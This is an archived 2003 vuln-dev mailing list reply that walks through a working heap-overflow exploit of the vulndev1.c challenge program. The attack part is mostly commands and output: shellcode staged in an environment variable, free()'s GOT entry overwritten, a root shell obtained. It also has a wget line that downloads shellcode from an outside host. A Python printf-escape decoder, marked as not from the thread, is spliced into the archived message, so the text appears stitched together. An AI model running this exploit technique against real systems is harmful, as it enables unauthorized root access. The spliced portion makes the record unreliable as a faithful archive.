Re: CORRECTION: vulndev1.c solution (WARNING! QUESTIONS!)

From: Jon Erickson <matrix(at)phiral.com>
Date: Wed May 21 2003 - 18:58:25 EDT

On Wed, 21 May 2003 14:38:11 -0700
"Jeremy Junginger" <jj@act.com> wrote:

> There was an erroneous /xfg below, that I re-ran with /xff. It's marked

Basically.. the free() function is going to add 12 to the address you feed it.. so you're just subtracting 12 to compensate for that...

> [root@OxFFFFFF bufferoverflow]# pcalc 0x38-12
> 44 0x2c 0y101100

Your shellcode consists of many \x42 type bytes.. this is how you represent bytes using printf() and other format functions using just printables. Basically, if you just do like..

printf `cat shell` > new_shell


That should fix it... also, if you want to use the piece of shellcode I used, you can just

wget www.phiral.com/research/shell

It's just a really basic setruid(0), then /bin/sh shellcode.. it's actually kinda big too..

> (Subtract the size of the shellcode from SIZE)

Well.. as Cameron Brown pointed out in an earlier post.. unless you happen to get lucky, you really need to have a jump statement at the beginning of the shellcode, because about 12 bytes will get mangled.. and if you try to execute the mangled bytes, it will segfault.

matrix@overdose vuln-dev $ gcc -o vuln1 vulndev1.c
matrix@overdose vuln-dev $ sudo chown root.root vuln1
matrix@overdose vuln-dev $ sudo chmod +s vuln1
matrix@overdose vuln-dev $ export SMEGMA=`printf "\xeb\x0e"`AAAAAAAAAAAAAAAAAA`cat shell`
matrix@overdose vuln-dev $ echo 'main(){printf("%p\n",getenv("SMEGMA"));}'>q.c;gcc -o q.ert q.c;./q.ert;rm q.*
0xbffffa04
matrix@overdose vuln-dev $ objdump -R ./vuln1 | grep free
080495f8 R_386_JUMP_SLOT free
matrix@overdose vuln-dev $ pcalc 0xf8-12
        236 0xec 0y11101100
matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x253;'` `printf "\xec\x95\x04\x08\x04\xfa\xff\xbf";`
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio)
sh-2.05b#

If you try using the method above (putting the shellcode in an environment variable), make sure that the name of the exploit program (vuln1) is the same length as the program used to get the address of the env variable (q.ert)

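The printf `cat shell` step above depends on printf rendering `\xHH` escapes into raw bytes, and the quoted post mentions an erroneous `\xfg` that had to be re-run. As an added example (not from the thread), here is a small Python decoder that mimics bash's lenient one-or-two-digit `\xHH` rule plus a checker that flags such typos, which printf accepts silently as the byte 0x0f followed by a literal 'g', leaving the file one byte longer than intended.

```python
import re

# Hex escape as bash's builtin printf reads it: "\x" followed by ONE or TWO hex digits.
# A faithful decoder therefore turns the typo "\xfg" into the byte 0x0f plus a literal 'g'.
_ESCAPE = re.compile(r"\\(x[0-9a-fA-F]{1,2}|[0-7]{1,3}|\\)")


def decode_printf_escapes(text: str) -> bytes:
    """Decode an escaped string roughly the way `printf "$(cat file)"` renders it.

    Handles \\xHH (1-2 hex digits), \\NNN (1-3 octal digits) and \\\\ (literal
    backslash); everything else is copied through unchanged.
    """
    out = bytearray()
    pos = 0
    for m in _ESCAPE.finditer(text):
        out += text[pos:m.start()].encode("latin-1")
        esc = m.group(1)
        if esc == "\\":
            out.append(0x5C)
        elif esc[0] == "x":
            out.append(int(esc[1:], 16))
        else:
            out.append(int(esc, 8) & 0xFF)
        pos = m.end()
    out += text[pos:].encode("latin-1")
    return bytes(out)


def find_malformed_hex_escapes(text: str) -> list:
    """Return (offset, snippet) for every \\x escape lacking exactly two hex digits.

    printf accepts these silently, so the only symptom is a byte string of the
    wrong length. Limitation: an escaped backslash followed by a literal 'x'
    ("\\\\x") is flagged as well.
    """
    bad = []
    for m in re.finditer(r"\\x([0-9a-fA-F]{0,2})", text):
        if len(m.group(1)) != 2:
            bad.append((m.start(), text[m.start():m.end() + 1]))
    return bad


if __name__ == "__main__":
    # Constructed sample: the thread's "\xeb\x0e" jump prefix followed by the typo "\xfg".
    sample = r"\xeb\x0e\xfg"
    print(find_malformed_hex_escapes(sample))  # [(8, '\\xfg')]
    print(decode_printf_escapes(sample).hex())  # eb0e0f67
```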

Received on Fri May 23 11:49:36 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:39 EDT

